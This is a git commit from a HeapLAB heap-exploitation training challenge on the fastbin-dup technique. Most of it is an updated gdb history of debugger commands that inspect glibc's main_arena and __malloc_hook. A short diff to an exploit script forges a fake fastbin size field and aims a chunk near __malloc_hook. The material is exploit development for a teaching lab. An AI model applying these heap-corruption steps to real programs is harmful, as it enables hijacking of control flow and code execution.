From 4c06c05f4eaf614ff0dfd4fe0fa62557331d7fb7 Mon Sep 17 00:00:00 2001
From: Brett Weiland <brett_weiland@bpcspace.com>
Date: Mon, 4 Jan 2021 18:48:38 -0600
Subject: 	modified:   HeapLAB/challenge-fastbin_dup/.gdb_history 
 modified:   HeapLAB/challenge-fastbin_dup/bruh.py

---
 HeapLAB/challenge-fastbin_dup/.gdb_history | 426 ++++++++++++++---------------
 HeapLAB/challenge-fastbin_dup/bruh.py      |   7 +-
 2 files changed, 217 insertions(+), 216 deletions(-)

(limited to 'HeapLAB')

diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
index b2cbfcb..4933f78 100644
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -1,256 +1,256 @@
+c
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+x main_arena
 x &main_arena
-x/100x &main_arena
-print main_arena
-fastbins
+x &__malloc_hook
+x main_arena.top
+db main_arena.top
+c
+c
+c
 q
-fastbins
+print __malloc_hook
+print __malloc_hook 
 fastbins
 c
-exit
-quit
-quit
 fastbins
-print main_arena
-q
-print main_arena
-q
+c
 vis_heap_chunks 
-print main_arena
-db main_arena
-db &main_arena
-db &main_arena/100
-db &main_arena 100
-db &main_arena 1000
-x main_arena.top
-x &main_arena.top
-db &main_arena 100
 c
 fastbins
-print main_arena
-x main_arena.fasbinsY
-x &main_arena.fastbinsY
-quit
-fastbins
-x 0x7f0946700b70
-db 0x7f0946700b70 100
-q
-fastbins
-q
+r
+c
 fastbins
-q
-fastbinsx
-db &main_arena 100
-q
-db 0x7f2e5c845b60
-0x7f2e5c845b70 + 16
-x 0x7f2e5c845b70 + 16
-x 0x7f2e5c845b70
-x 0x7f2e5c845b70
-x 0x7f2e5c845b60
-vis_heap_chunks 
-db 0x7f0ba6e3db70
-db 0x555bdeaca000 100
-db 0x7f0ba6e3db70
-db 0x7f0ba6e3db70 - 8
-db 0x7f0ba6e3db70-8
-db 0x7f0ba6e3db70-7
-q
-x 0x7fcf882cbb69
-db 0x7fcf882cbb69
-q
-vis_heap_chunks 
-print main_arena
-q
 print main_arena
-vis_heap_chunks 
-q
-print main_arena 
-q
-print main_arena 
-fastbins
-r
-q
-r
+vis_heap
 c
-fastbisn
-vis_heap_chunks 
 fastbins
-quit
 fastbins
-print main_arena 
 c
-print main_arena 
-q
-print main_arena 
-print main_arena 
-x malloc_free_hook
-x __free_hook
-x &__free_hook
-x &__free_hook 100
-db &__free_hook 100
-q
-q
-q
-q
-print main_arena 
-db 0x7f4858584e10
-c
-print victim
-q
 fastbins
+r
 c
-x idx
-x chunksize(p)
-x chunksize
-x p
-fastbins
+ quit
+db main_arena
+db &main_arena.fastbinsY 
 q
-x __free_hook 
-x &__free_hook 100
-db &__free_hook 100
-db &__free_hook - 100
-db &__free_hook-100
-db &__free_hook-100 100
-print main_arena 
-x 0x7fca0f75fe10
-x/100 0x7fca0f75fe10
-x/100 0x7fca0f75fe10-100
+r
 c
-q
-break malloc
 c
 fastbins
-x __free_hook 
-fastins
-fastbins
-print main_arena 
-x 0x7f072b59ee10
-break malloc
-break free
-continue
-c
-c
+print &main_arena
+print main_arena
 c
 print main_arena
-vis_heap_chunks 
-vis_heap_chunks 
+db main_arena
+db &main_arena
+db &main_arena/100
+db &main_arena 100
+db &main_arena 1000
+q
+db main_arena.bins
+db &main_arena.fastbinsY 
+run
 c
-vis_heap_chunks 
-break free
-break malloc
 c
-print main_arena
-x &__free_hook - 16
 q
-print main_arena
-vis_heap_chunks 
+r
 c
+fastbins
 c
+fastbins
 c
-q
-db __malloc_hook
-db &__malloc_hook
-x __malloc_hook
-x &__malloc_hook
+fastbins
+r
 c
-break sysmalloc
 c
-frame 2
-context
+r
+1
 c
-break main
 c
-q
-x &__malloc_hook
-print __malloc_hook
-print &__malloc_hook
-print __main_arena
 print main_arena
-print main_arena 
 x __malloc_hook
 x &__malloc_hook
-db &__malloc_hook
-db &__malloc_hook-100 100
-db &__malloc_hook-100 100*8
-db &__malloc_hook-100 (100*8)+1
-fastbins
-c
+x 0x7ffff7dd0bc0
+x &main_arena
+q
+print &main_arena 
+print main_arena 
+db main_arena 
+db &main_arena  100
 print main_arena
-x __malloc_hook
-x &__malloc_hook
-db &__malloc_hook-100 (100*8)+1
-c
-db &__malloc_hook-100 (100*8)+1
+print &main_arena
+db &main_arena
+db &main_arena + 1
+db &main_arena+1
+find_fake_fast main_arena.fastbinsY
+find_fake_fast &main_arena.fastbinsY
+x &main_arena.fastbinsY
+db main_arena
+db &main_arena
+db &main_arena+1
+db &main_arena+0
+dq &main_arena+0
+dq &main_arena+1
+x/x 00007fc130a1cb60
+x/x 0x00007fc130a1cb60
+x/x 0x7fc130a1cb69
+x main_arena
+x &main_arena
+x 0x0x7fc130a1cb68
+x 0x7fc130a1cb68
+x 0x7fc130a1cb68+1
+x/10x 0x7fc130a1cb68+1
+x/10x 0x7fc130a1cb68+0
+x/10x 0x7fc130a1cb68+1
+x/10x 0x7fc130a1cb69
+db 0x7fc130a1cb69
+db 0x7fc130a1cb71
+db 0x7fc130a1cb70
+x main_arena
+print &main_arena
+db &main_arena+1
+dq &main_arena+1
+q
+x 0x7f7151e3cb70
+db 0x7f7151e3cb70
+db main_arena
+db &main_arena
 print main_arena
-x 0x7f5b07a18b40
-break malloc
-c
-c
-c
+x main_arena
+print &main_arena
+db 0x7f7151e3cb69
+db 0x7f7151e3cb68
+db 0x7f7151e3cb67
+db 0x7f7151e3cb68
+db 0x7f7151e3cb69
+dq 0x7f7151e3cb69
+db 0x7f7151e3cb69
+db 0x7f7151e3cb67
+db 0x7f7151e3cb69
+db 0x7f7151e3cb68
+find_fake_fast main_arena
+find_fake_fast &main_arena
+db 0x7f7151e3cb68
+db 0x7f7151e3cb69
+db 0x7f7151e3cb67
+db 0x7f7151e3cb68
+db 0x7f7151e3cb70
+db 0x7fc130a1cb69
+db 0x7f7151e3cb70
+db 0x7f7151e3cb69
+find_fake_fast &__free_hook
+find_fake_fast &__realloc_hook
+find_fake_fast &__memalign_hook
+find_fake_fast &__malloc_initialize_hook
+find_fake_fast &__after_morecore_hook
+find_fake_fast q
 q
-break __libc_malloc 
-break malloc
-break __malloc_hook
-b __malloc_hook 
-b &__malloc_hook 
-b *__malloc_hook 
-b *&__malloc_hook 
-c
-delete 3
-c
-pwndbg heap
-vis_heap_chunks 
-print __mallinfo
-x __mallinfo
-print  &__mallinfo
-print  *__mallinfo
-print  __mallinfo
-print &__mallinfo
+quit
+q
+fastbins 
+c
+frame 4
+context code
+x 0x7fd533e9cb68
+db 0x7fd533e9cb68
+x fastbins
+print main_heap
+print &main_heap
+print &main_arena
 print main_arena
-c
-break malloc
-c
-x main_arena.top_check
-x main_arena.top_chunk
+db 0x7fee89f0ee10
+db 0x7fee89f0ee10 10
+db 0x7fee89f0ee10 48
+db 0x7fee89f0ee10-3 48
+db 0x7fee89f0ee10-3 (16*4)
+db 0x7fee89f0ee10
+db 0x7fee89f0ee10 - 1
+db 0x7fee89f0ee10-1
+db 0x7fee89f0ee10-1 1
+db 0x7fee89f0ee10-1 32
+db 0x7fee89f0ee10-1 (48)
+db 0x7fee89f0ee10-1 (48 * 3)
+db 0x7fee89f0ee10-1 (48*3)
+db 0x7fee89f0ee10-1
+db 0x7fee89f0ee10
+q
 print main_arena
-x 0x7f4854db6b40
-x 0x7f4854db6b40
-x 0x7f4854db6b40
+x 0x7fdb92f8ee10
 c
-x 0x7f4854db6b40
-fastbins
-c
-x 0x7f4854db6b40
-c
-x 0x7f4854db6b40
-x main_arena
-x &main_arena
+find_fake_fast &malloc_hook
+find_fake_fast &__malloc_hook
+x __malloc_hook
 x &__malloc_hook
-x main_arena.top
-db main_arena.top
-c
-c
-c
-q
-print __malloc_hook
-print __malloc_hook 
-fastbins
-c
-fastbins
-c
-vis_heap_chunks 
-c
-fastbins
-r
-c
-fastbins
+x &__malloc_hook
+x &__malloc_hook - 16
+x &__malloc_hook
+db &__malloc_hook-100
+db &__malloc_hook-100 100
+db &__malloc_hook-1
+db &__malloc_hook
+db &__malloc_hook-48 48
+db &__malloc_hook-48 48 * 8
+db &__malloc_hook-48 48*8
+db &__malloc_hook-48*8 48
+db &__malloc_hook-80*8 80
+db &__malloc_hook-160*8 80
+db &__malloc_hook-160 80
+db -h
+db &__malloc_hook
+x __malloc_hook
+x &__malloc_hook
+x __malloc_hook-100
+x &__malloc_hook-100
+x &__malloc_hook-100 100
+x &__malloc_hook-100 100
+db &__malloc_hook-100 100
+db &__malloc_hook-100 100*8
+print (void*)&malloc_hook
+print (void*)&__malloc_hook
+db &__malloc_hook-100 101*8
+db &__malloc_hook-100 101*8
+db &__malloc_hook-100 100*8
+db &__malloc_hook-100
+db &__malloc_hook-(16*9)
+db &__malloc_hook-(16*9) 16*9
+db &__malloc_hook-(10) (10*16)
+db &__malloc_hook-(10) (10*8)
+db &__malloc_hook-(1) (10*8)
+db &__malloc_hook-(11
+db &__malloc_hook
+db &__malloc_hook-1
+db &__malloc_hook-8
+db &__malloc_hook
+db &__malloc_hook-32
+db &__malloc_hook-(32/8)
+db &__malloc_hook-(32/8) 1
+db &__malloc_hook-(32/8) 10
+db 0x7f5575614b2a 1
+db 0x7f5575614b2a 
+db 0x7f5575614b20
+db &__malloc_loc
+db &__malloc_hook-(16) (16*8)
+print (void*)__malloc_hook
+print (void*)&__malloc_hook
+db 0x7f5575614b36
+0x7f5575614b2a
+find_fake_fast 
+find_fake_fast &__malloc_hook
+print (void*)&__malloc_hook
+exit
+quit
 print main_arena
-vis_heap
-c
-fastbins
-fastbins
-c
-fastbins
-r
-c
- quit
+x 0x7f265fd4cb2d
+x 0x7f265fd4cb2d
+db 0x7f265fd4cb2d
+print (void*)&__malloc_hook
+find_fake_fast &__malloc_hook
+db 0x7f265fd4cb2d
+db 0x7f265fd4cb2d - 1
+db 0x7f265fd4cb2d-1
+db 
+c
+db &__malloc_hook-(16) (16*8)
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 191cbea..56b0c71 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -55,7 +55,7 @@ free(chunk1)
 
 #malloc(24, p64(libc.sym.main_arena + 96))
 #this sets up a fake size field in the fastbins
-malloc(24, p64(0x81))
+malloc(24, p64(0x80))
 malloc(24, 'asdf')
 malloc(24, 'asdf')
 
@@ -74,9 +74,10 @@ malloc(119, 'sdfg')
 
 #8 * 9
 
-malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+payload_loc = libc.sym.__malloc_hook - 35
+malloc(119, p64(0)*9 + p64(payload_loc))
 
-print(hex(fake_chunk_loc)) 
+print("top chunk addr: {}".format(hex(payload_loc)))
 
 # =============================================================================
 
-- 
cgit v1.2.3